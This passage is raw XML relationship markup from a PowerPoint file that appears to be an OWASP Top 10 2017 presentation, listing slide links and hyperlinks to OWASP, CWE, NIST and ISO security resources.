Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V1_Architecture" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="Externa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17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.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notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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notesSlide" Target="../notesSlides/notesSlide20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.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tags" Target="../tags/tag20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.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tags" Target="../tags/tag23.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/omerlh" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/eyalestrin" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk.com/"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https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag4.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" 